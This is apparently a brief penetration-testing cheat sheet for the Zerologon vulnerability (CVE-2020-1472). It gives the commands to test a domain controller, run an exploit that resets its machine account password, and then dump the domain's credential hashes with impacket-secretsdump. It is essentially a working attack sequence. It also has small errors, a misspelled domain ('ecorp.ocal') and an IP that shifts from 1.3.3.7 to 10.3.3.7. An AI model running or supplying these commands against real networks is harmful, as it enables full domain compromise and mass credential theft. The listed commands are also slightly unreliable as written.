CVE-2020-1472 - Zerologon

Testing it

python3 zerologon_tester.py dc01.ecorp.local 1.3.3.7

Exploiting it,

python3 cve-2020-1472-exploit.py -t 1.3.3.7 -n ecorp.ocal

After this, machine account password should be resetted.

Secretsdump with empty machine account password

impacket-secretsdump -no-pass -just-dc ecorp.local/ecorp-dc01\$@10.3.3.7

Last updated